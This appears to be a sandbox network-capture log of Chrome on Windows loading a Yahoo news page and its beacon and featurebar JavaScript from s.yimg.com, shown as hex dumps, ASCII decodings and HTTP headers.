                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 62 62 36 2d 37 33 34 32 64 37 61 63 31 34 31 36 3e 3c 61 72 74 69 63 6c 65 20 74 61 62 69 6e 64 65 78 3d 2d 31 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 61 69 6e 65 72 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 63 61 61 73 2d 6c 65 61 64 2d 68 65 61 64 65 72 2d 35 33 63 35 33 62 32 39 2d 31 38 31 61 2d 33 36 31 30 2d 61 62 62 36 2d 37 33 34 32 64 37 61 63 31 34 31 36 3e 3c 73 63 72 69 70 74 20 63 6c 61 73 73 3d 63 61 61 73 2d 74 69 6d 65 7a 6f 6e 65 2d 63 6f 6e 66 69 67 20 74 79 70 65 3d 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 7b 5c 22 6c 6f 6e 67 46 6f 72 6d 5c 22 3a 7b 5c 22 77 65 65 6b 64 61 79 5c 22 3a 5c 22 73 68 6f 72 74 5c 22 2c 5c 22 64 61 79 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: bb6-7342d7ac1416><article tabindex=-1 class=caas-container aria-labelledby=caas-lead-header-53c53b29-181a-3610-abb6-7342d7ac1416><script class=caas-timezone-config type=application/json>\n {\"longForm\":{\"weekday\":\"short\",\"day\":\"numeric\",\"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 63 6c 61 73 73 3d 5c 22 63 61 61 73 2d 62 75 74 74 6f 6e 20 6e 6f 62 6f 72 64 65 72 20 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 2d 62 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 79 6c 6b 3d 5c 22 69 74 63 3a 31 3b 73 6c 6b 3a 52 65 61 64 20 66 75 6c 6c 20 61 72 74 69 63 6c 65 5c 22 3e 52 65 61 64 20 66 75 6c 6c 20 61 72 74 69 63 6c 65 3c 69 3e 3c 2f 69 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 62 6f 64 79 2d 69 6e 6e 65 72 2d 77 72 61 70 70 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 62 6f 64 79 2d 73 65 63 74 69 6f 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 65 6e 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: class=\"caas-button noborder caas-body-collapse-button\" data-ylk=\"itc:1;slk:Read full article\">Read full article<i></i></button><div><div class=caas-body-inner-wrapper><div class=caas-body-section><div class=caas-content><div class=caas-content-wrapper
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 20 44 6f 77 6e 20 50 6c 61 73 74 69 63 20 53 75 72 67 65 72 79 20 52 75 6d 6f 72 73 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 68 65 61 64 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 65 6e 74 2d 62 79 6c 69 6e 65 2d 77 72 61 70 70 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 69 74 65 6d 2d 61 75 74 68 6f 72 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 75 74 68 6f 72 2d 62 79 6c 69 6e 65 2d 63 6f 6c 6c 61 70 73 65 3e 48 61 6e 6e 61 68 20 44 61 69 6c 65 79 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Down Plastic Surgery Rumors</h1></div></header><div class=caas-content-byline-wrapper><div class=caas-attr><div class=caas-attr-meta><div class=caas-attr-item-author><span class=caas-author-byline-collapse>Hannah Dailey</span></div><div class=caas-attr-t


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              92192.168.2.45111287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC539OUTGET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 7KC3XqHhzbX7LqN2Clx+0cW1Bb5wJkp5gEl1y2RN2ciPe5vFaAGm6SZoYqs4iOlbhHOHhSFioRQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: ENBZ70JSTQQBQQXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 15:55:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 13 Feb 2023 05:31:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "397b59e3eeca4f747ea1f6ff6323154c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: tENZ6Ri2vrrjg96D4AX.qx653XeJQH2M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 271101
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),u=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 70 65 72 63 65 6e 74 61 67 65 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 6d 3d 66 28 77 2c 32 29 2c 6b 3d 6d 5b 30 5d 2c 54 3d 6d 5b 31 5d 2c 6a 3d 6b 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 6b 2c 31 30 29 29 2c 30 29 3a 35 30 2c 43 3d 54 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 54 2c 31 30 29 29 2c 30 29 3a 35 30 2c 50 3d 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 63 75 6d 75 6c 61 74 69 76 65 22 29 2c 41 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4f 2b 22 62 65 61 63 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6c 61 73 73 22 29 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ttribute(O+"trigger-percentage")||"").split(" "),m=f(w,2),k=m[0],T=m[1],j=k?Math.max(Math.min(100,parseInt(k,10)),0):50,C=T?Math.max(Math.min(100,parseInt(T,10)),0):50,P=e.hasAttribute(O+"trigger-cumulative"),A=e.getAttribute(O+"beacon-container-class")||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6f 66 66 73 65 74 59 2c 70 3d 69 2e 73 65 6c 65 63 74 6f 72 2c 79 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 63 2d 75 29 3b 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 2d 69 6e 2d 70 72 6f 67 72 65 73 73 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 28 66 7c 7c 21 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 26 26 28 30 3d 3d 3d 79 7c 7c 21 31 3d 3d 3d 6e 7c 7c 64 2e 69 73 50 61 67 65 56 69 73 69 62 6c 65 26 26 77 28 6f 2c 6c 28 7b 7d 2c 69 2c 7b 6f 66 66 73 65 74 58 3a 68 2c 6f 66 66 73 65 74 59 3a 76 7d 29 2c 64 2e 76 69 65 77 70 6f 72 74 29 29 29 72 65 74 75 72 6e 20 61 26 26 61 2e 73 70 6c 69 74 28 22 7c 22 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: offsetY,p=i.selector,y=Math.max(0,c-u);o.classList.add("wafer-beacon-in-progress"),setTimeout(function(){if((f||!o.classList.contains(s))&&(0===y||!1===n||d.isPageVisible&&w(o,l({},i,{offsetX:h,offsetY:v}),d.viewport)))return a&&a.split("|").forEach(funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6e 63 74 69 6f 6e 28 72 29 7b 72 26 26 22 6d 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 74 26 26 65 2e 64 65 73 74 72 6f 79 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 59 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 7c 7c 65 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 58 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nction(r){r&&"mouseenter"===t&&e.destroy()})}},{key:"offsetY",set:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;this._util.offsetY=this._util.offsetY||e}},{key:"offsetX",set:function(){var e=arguments.length>0&&void 0!==argumen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 41 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2c 45 3d 41 2e 62 69 6e 64 45 76 65 6e 74 2c 78 3d 41 2e 65 61 63 68 2c 53 3d 41 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 2c 58 3d 41 2e 74 68 72 6f 74 74 6c 65 2c 59 3d 41 2e 75 6e 62 69 6e 64 45 76 65 6e 74 2c 49 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 4c 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ritable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),A=window.wafer.utils,E=A.bindEvent,x=A.each,S=A.elementInView,X=A.throttle,Y=A.unbindEvent,I=window.wafer.base,L=window.wafer.controllers.Wafer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 6d 61 70 4f 66 66 73 65 74 28 29 2c 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 44 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3b 74 26 26 78 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 59 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 65 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 64 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "handleResize",value:function(){this._mapOffset(),this._validateWithThrottle()}},{key:"willDestroy",value:function(){var e=this,t=this._options.container;t&&x(t,function(t){Y(t,"scroll",e._validateWithThrottle)})}},{key:"didSync",value:function(){var e=th
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC237INData Raw: 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2a 70 2f 31 30 30 2c 31 30 29 29 2c 21 76 26 26 28 6c 2e 69 6e 73 74 61 6e 63 65 2e 6f 66 66 73 65 74 58 3d 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 57 69 64 74 68 2a 64 2f 31 30 30 2c 31 30 29 29 7d 7d 63 61 74 63 68 28 65 29 7b 72 3d 21 30 2c 6e 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 74 26 26 6f 2e 72 65 74 75 72 6e 26 26 6f 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f 77 20 6e 7d 7d 7d 7d 5d 29 2c 74 7d 28 4c 29 2c 42 3d 56 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 42 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: -parseInt(c.clientHeight*p/100,10)),!v&&(l.instance.offsetX=-parseInt(c.clientWidth*d/100,10))}}catch(e){r=!0,n=e}finally{try{!t&&o.return&&o.return()}finally{if(r)throw n}}}}]),t}(L),B=V;t.default=new B({selector:".wafer-beacon"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              93192.168.2.45111987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC416OUTGET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: wZw3cV/+XY7kPLr6bN8b0KrKqi+sUu5sEqSfNGuZwLAW/7L9XYP1ut/a4oi74JFkeKnKEtUpOiI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: S9VNZEK3BST7TGTG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 02 Oct 2024 05:17:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 04 Aug 2022 04:32:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "12732500bc8e47693f0d777bbe88001c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: ktIqZY5t35wTM4d07XFqB.S0kDb7QpBg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 568564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 66 65 61 74 75 72 65 62 61 72 49 64 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 72 65 61 63 74 2d 77 61 66 65 72 2d 46 65 61 74 75 72 65 62 61 72 22 29 5b 30 5d 3b 69 66 28 65 29 7b 69 66 28 65 2e 63 6c 61 73 73 4c 69 73 74 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 75 74 6f 2d 63 6c 6f 73 65 22 29 29 7b 76 61 72 20 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65 61 74 75 72 65 62 61 72 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-conte
